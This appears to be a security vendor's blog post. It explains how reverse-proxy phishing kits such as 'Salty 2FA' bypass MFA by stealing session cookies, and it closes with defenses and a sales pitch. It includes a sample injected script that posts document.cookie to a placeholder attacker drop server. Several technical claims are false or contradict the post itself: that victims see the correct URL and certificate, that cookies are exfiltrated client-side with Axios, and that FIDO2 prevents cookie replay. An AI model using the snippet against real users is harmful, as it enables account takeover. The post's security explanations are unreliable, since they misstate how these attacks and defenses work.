Axios Abuse & Salty 2FA Kits: A New Phishing Threat

Multi-Factor Authentication (MFA) has become the gold standard for account security. For years, organizations have rightly pushed for its adoption, believing it to be a near-impenetrable shield against credential theft. However, our intelligence shows a trend that threat actors are no mre focusing on trying to break the shield but simply walking around it (I mean, who chooses the hard way out?).

A new generation of phishing attacks are actively bypassing MFA by focusing not on the password, but on the session cookie that is generated after a successful login. Our latest analysis reveals a specific attack chain that leverages a legitimate, widely-used JavaScript library, Axios, in combination with advanced phishing kits to achieve this.

The Attack Chain: From Phishing Link to Session Hijack

The attack relies on a clever man-in-the-middle (MitM) reverse proxy setup. Instead of creating a fake login page that looks like the real one, the attacker's server acts as an invisible bridge between the victim and the legitimate service (e.g., Microsoft 365, Google Workspace).

Step 1: The attack begins with a standard phishing email or SMS, urging the user to log in to their account due to a supposed security alert or pending invoice. The link points to the attacker's server.

Step 2: When the victim clicks the link, they are not sent to a fake page. The attacker's server fetches the real login page from the legitimate service and presents it to the victim. The victim sees the correct URL, the correct SSL certificate, and a pixel-perfect login form because they are interacting with the real thing, just proxied through the attacker.

Step 3: The victim enters their username and password. The attacker's server captures these credentials and passes them on to the legitimate service. The legitimate service then challenges the user for their MFA code (e.g., from an authenticator app). The victim enters the code, which is also captured by the attacker and passed along.

This is where phishing kits like "Salty 2FA" come into play. These kits are pre-built tools that automate this entire reverse proxy and interception process, making it easy for even moderately skilled attackers to deploy.

Step 4: After the victim successfully authenticates with their password and MFA code, the legitimate service sends back a session cookie to the user's browser to keep them logged in. Because the attacker is in the middle of the connection, they intercept this session cookie before it ever reaches the victim.

The password was useful, but the session cookie is the sort after.

Exfiltrating the Cookie

This is where our latest intelligence reveals a novel technique. How does the attacker get the stolen session cookie from their server back to their own machine for use?

We have observed phishing kits that inject a small, malicious JavaScript payload into the proxied webpage. This script uses the Axios library, a very popular and legitimate tool for making HTTP requests, which is often already present on modern web applications.

1. The phishing kit's server-side code captures the Set-Cookie header from the legitimate service's response.

2. It injects a script into the HTML sent to the victim's browser.

3. This script uses Axios to make a silent, background POST request to a separate server controlled by the attacker (a "drop server"). The body of this request contains the stolen session cookie.

// Malicious injected script (simplified example)

const stolenCookie = document.cookie axios.post("https://attacker-drop-server.com/collector", { cookie: stolenCookie, victim_ip: "...", })

Because Axios is a legitimate library, this malicious traffic is much less likely to be flagged by network security tools than a suspicious custom script. The attacker now has the victim's active session cookie and can inject it into their own browser, gaining full, authenticated access to the victim's account without ever needing the password or MFA code again (until the session expires).

This attack technique effectively renders traditional MFA useless against a dedicated attacker. The business impact is severe, can lead to Business Email Compromise (BEC), internal data theft, and further propagation of attacks within the organization.

How to Defend:

1. Phishing-Resistant MFA: This is the most important defense. Move away from push notifications and one-time codes. Implement FIDO2/WebAuthn-based authenticators like YubiKeys or platform authenticators (Windows Hello, Face ID). These methods cryptographically bind the login session to the user's device, making it impossible for an attacker to replay a stolen session cookie from a different machine.

2. Advanced Email Security: A sophisticated email security gateway like The Birdling’ can often detect the subtle signs of a reverse proxy phishing link before it ever reaches the user's inbox.

3. Continuous User Training: While training alone is not enough, teaching users to be suspicious of any unexpected login request and to verify the source is a critical layer of defense.

4. Conditional Access Policies: Implementing policies that flag or block logins from unfamiliar locations or networks can help mitigate the impact of a stolen session.

The threat landscape is constantly evolving. We cannot afford to become complacent, even with strong controls like MFA in place.

The Birdling's Managed Defense services are designed to combat these advanced threats by integrating best-in-class email security and monitoring for the anomalous behavior associated with session hijacking. Contact us for a threat briefing to learn more.